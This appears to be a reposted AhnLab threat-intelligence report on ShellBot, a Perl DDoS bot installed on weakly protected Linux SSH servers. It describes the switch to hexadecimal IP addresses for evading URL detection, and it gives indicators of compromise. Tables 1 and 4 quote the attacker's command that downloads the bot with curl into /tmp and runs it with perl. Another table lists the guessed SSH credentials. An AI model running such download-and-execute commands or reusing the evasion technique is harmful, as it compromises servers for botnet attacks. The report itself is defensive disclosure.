ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses

by Prapattimynk, Thursday, 12 October 2023 (5 months ago)
ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses


AhnLab Security Emergency response Center (ASEC) has recently discovered a change in the distribution method of the ShellBot malware, which is being installed on poorly managed Linux SSH servers. The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value.

  • hxxp://0x2763da4e/dred
  • hxxp://0x74cc54bd/static/home/dred/dred

1. Past Case of URL Detection Evasion

Typically, IP addresses are used in the “dot-decimal notation” format, with threat actors using addresses such as “hxxp://94.250.254[.]43/” for their C&C, download, and phishing URLs. However, IP addresses can be expressed in formats other than the “dot-decimal notation”, including decimal and hexadecimal notations, and are generally compatible with widely used web browsers.

Due to this, threat actors have employed diverse URL techniques to circumvent URL detection, and there was a previous instance of a decimal address being utilized to create a phishing PDF malware. The phishing PDF malware contained the URL “hxxp://1593507371” which, in “dot-decimal notation”, translates to “hxxp://94.250.254[.]43/”.

Figure 1. Malicious URL contained in the phishing PDF malware

Clicking on the URL in the phishing PDF causes the web browser to connect to the address “hxxp://1593507371”, which leads to the same result as connecting to the address “hxxp://94.250.254[.]43/”. The threat actor used this decimal IP address notation as their URL to evade malicious URL detection, and when accessed, users were redirected to various phishing sites.

Figure 2. Addresses that users were redirected to when the link in a past PDF was clicked

2. Past Attack Cases of ShellBot

After scanning systems that have operational port 22s, threat actors search for systems where the SSH service is active and use a list of commonly used SSH account credentials to initiate their dictionary attack. If they manage to successfully log in, they are able to install a variety of malware.

ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with a C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems. ASEC has covered ShellBot attack cases in a past blog post [1] and is continuously detecting and responding to attack sources, downloads, and C&C addresses.

Among the ShellBot malware variants still in circulation, there is a type known as “DDoS PBot v2.0”, and a distinctive feature of the specific threat actor who has been using this variant in their attacks is their consistent use of the name “dred” during malware installation.

Figure 3. Initial routine of DDoS PBot v2.0
FilenameInstallation CommandC&C URLIRC Channel
dreduname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred192.3.141[.]163:6667#new
dreduname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred192.3.141[.]163:6667#bigfalus
Table 1. Commands and C&C information used upon installing ShellBot – past
Command (Category)Description
systemOutputs information of infected system
versionOutputs version information
channelIRC control commands
floodDDoS commands
TCP, UDP, HTTP, SQL Flooding, etc.
utilsAttack commands
Port Scan, Reverse Shell, file download, etc.
Table 2. Features supported by DDoS PBot v2.0

3. Latest Attack Cases of ShellBot

In September 2023, it was confirmed that the same threat actor was installing ShellBot using hexadecimal IP addresses instead of their usual “dot-decimal notation” format IP addresses. The following is a section of a list containing the attack source addresses that conducted these attacks, along with the corresponding IDs and passwords that were utilized.

IDPasswordAttack Source Address
adminadmin61.242.178[.]220
root!Q2w3e4r135.125.240[.]201
cloudcloud124.222.211[.]66
rootroot12331.145.142[.]206
postgrespostgres175.178.157[.]198
rootPassw0rd123.6.5[.]229
Table 3. Account credentials and attack source addresses used by the ShellBot threat actor

After successfully logging in, the threat actor used the following commands to install ShellBot. In comparison to previous cases, the commands themselves remain the same; the only difference is the use of hexadecimal values for the IP address.

FilenameInstallation CommandC&C URLIRC Channel Name
dreduname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://0x2763da4e/dred -o /tmp/dred;perl /tmp/dred192.3.141[.]163:6667#news
dreduname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://0x74cc54bd/static/home/dred/dred -o /tmp/dred;perl /tmp/dredN/AN/A
Table 4. Commands and C&C information used upon installing ShellBot – recent
Figure 4. Configuration data of DDoS PBot v2.0

The address represented in hexadecimal as “0x2763da4e” corresponds to “39.99.218[.]78”, and “0x74cc54bd” corresponds to “116.204.84[.]189”. Due to the usage of curl for the download and its ability to support hexadecimal just like web browsers, ShellBot can be downloaded successfully on a Linux system environment and executed through Perl.

Figure 5. Showing that curl supports hexadecimal IP addresses

4. Conclusion

The ShellBot malware is being installed on poorly managed Linux SSH servers, with recent cases confirming its use of hexadecimal IP addresses to evade behavior-based detection. If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor. Moreover, the threat actor could use various other backdoor features to install additional malware or launch different types of attacks from the compromised server.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from external sources to restrict access by threat actors. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.

ASEC uses Linux SSH honeypots to collect these attack source addresses in real-time, and the confirmed attack source addresses are provided through AhnLab TIP.

Figure 6. Thread IOC page of AhnLab TIP

File Detection
– Shellbot/Perl.Generic.S1100 (2020.02.12.00)

IOC
MD5

– 8853bb0aef4a3dfe69b7393ac19ddf7f: ShellBot – past
– 7bc4c22b0f34ef28b69d83a23a6c88c5: ShellBot – past
– a92559ddace1f9fa159232c1d72096b2: ShellBot – recent

Download URLs
– hxxp://39.107.61[.]230/dred: ShellBot (past)
– hxxp://39.165.53[.]17:8088/iposzz/dred: ShellBot (past)
– hxxp://39.99.218[.]78/dred: ShellBot – 0x2763da4e (recent)
– hxxp://116.204.84[.]189/static/home/dred/dred: ShellBot – 0x74cc54bd (recent)

C&C URL
– 192.3.141[.]163:6667: ShellBot

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Comments

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.